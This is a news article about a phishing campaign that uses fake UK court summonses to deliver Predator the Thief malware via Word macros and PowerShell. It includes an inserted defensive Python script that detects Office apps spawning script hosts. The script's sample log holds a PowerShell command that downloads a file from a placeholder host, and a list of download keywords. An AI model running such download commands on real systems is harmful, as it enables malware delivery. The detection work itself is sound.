
Phishing campaign delivers data-stealing malware via fake court summons emails

by technewshero
November 6, 2019
in Security

A newly uncovered hacking campaign is targeting employees in the insurance and retail industries with phishing emails, claiming to be from the Ministry of Justice, that infect the victim with information-stealing malware.

Uncovered by researchers at cybersecurity company Cofense, the phishing emails have the subject ‘Court’ and feature UK Ministry of Justice logos. They claim to provide information about ‘Your Subpoena’, and ask the victim to click a link because they’ve been ordered to attend a law court and have 14 days to comply. There’s no information about what the court case supposedly relates to.

If victims click through to the link, they’re directed to a cloud hosting provider which redirects them to a document containing Predator the Thief, a form of malware that’s commonly up for sale on underground hacking forums.

Predator the Thief can steal usernames, passwords, browser data and the contents of cryptocurrency wallets, as well as take photos using a webcam. The malware first emerged in July 2018.

The phishing emails use a number of layers to hide the malicious intention of the message from security software. The email contains a Google Docs link which, if clicked, automatically redirects the user to Microsoft OneDrive, which delivers a Microsoft Word document to the victim. As in many other phishing campaigns, the document asks users to enable macros; if they do, the malware is downloaded via PowerShell.
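
The last hop of this chain, a Word macro launching PowerShell, is visible in process-creation telemetry. The following is an added example, not code from Cofense or the original article: a detection pass that flags Office applications spawning script hosts. It assumes one JSON object per line with Sysmon Event ID 1 field names; the sample log, host names and the example.invalid URL are constructed.

```python
import json
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # macro-capable hosts
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe"}
# Case-insensitive command-line substrings that suggest a network download.
DOWNLOAD_HINTS = ("invoke-webrequest", "downloadfile", "downloadstring", "http://", "https://")

# Constructed sample log: one JSON object per line, Sysmon Event ID 1 field names.
SAMPLE_LOG = r"""
{"Computer":"WS-041","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"WINWORD.EXE /n court.doc"}
{"Computer":"WS-041","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NoProfile Invoke-WebRequest https://files.example.invalid/a.bin -OutFile a.bin"}
{"Computer":"WS-007","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe"}
{"Computer":"WS-112","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c dir"}
{"Computer":"WS-113","ParentImage": truncated record
"""

def image_name(path):  # lower-cased file name of a Windows path, '' if missing
    return PureWindowsPath(path or "").name.lower()

def triage(event):
    """Return an alert for an Office process spawning a script host, else None."""
    parent = image_name(event.get("ParentImage"))
    child = image_name(event.get("Image"))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_CHILDREN:
        return None
    cmd = str(event.get("CommandLine", "")).lower()
    hints = [h for h in DOWNLOAD_HINTS if h in cmd]
    return {"host": event.get("Computer", "?"), "lineage": f"{parent} -> {child}",
            "severity": "high" if hints else "medium", "download_hints": hints}

def scan(text):
    """Triage every parseable record; malformed lines are counted, not fatal."""
    alerts, skipped = [], 0
    for line in filter(None, map(str.strip, text.splitlines())):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            skipped += 1
            continue
        alert = triage(event) if isinstance(event, dict) else None
        if alert:
            alerts.append(alert)
    return alerts, skipped

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

PowerShell started from explorer.exe is deliberately not flagged; only the Office-to-script-host lineage is, with severity raised when the command line also shows a download.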

The malware then connects to a command-and-control server, and provides the attacker with a gateway to the infected system and the ability to secretly steal data. When the cyber criminals decide they have gathered all the data they need, Predator the Thief self-destructs, cleaning up any evidence that it was there in the first place.

Legal technicality

Shock tactics such as telling a potential victim they have a court date are a regular trick used by cyber criminals, designed to scare people into clicking phishing links and downloading malware. However, there’s a prominent clue that all is not right with this message, and it’s not just the strange email address.

The message refers to a subpoena. The term is regularly used in the United States, but the UK court system hasn’t used ‘subpoena’ since 1999, when the relevant term was changed to ‘witness summons’.

The email’s phrasing therefore suggests that while the cyber criminals are using UK imagery in an attempt to dupe victims, they’re not familiar with the details of the local system.

To help protect against these kinds of attacks, researchers recommend that macros are disabled by default and that users are educated about the dangers of enabling them.

© 2020 Tech News Hero.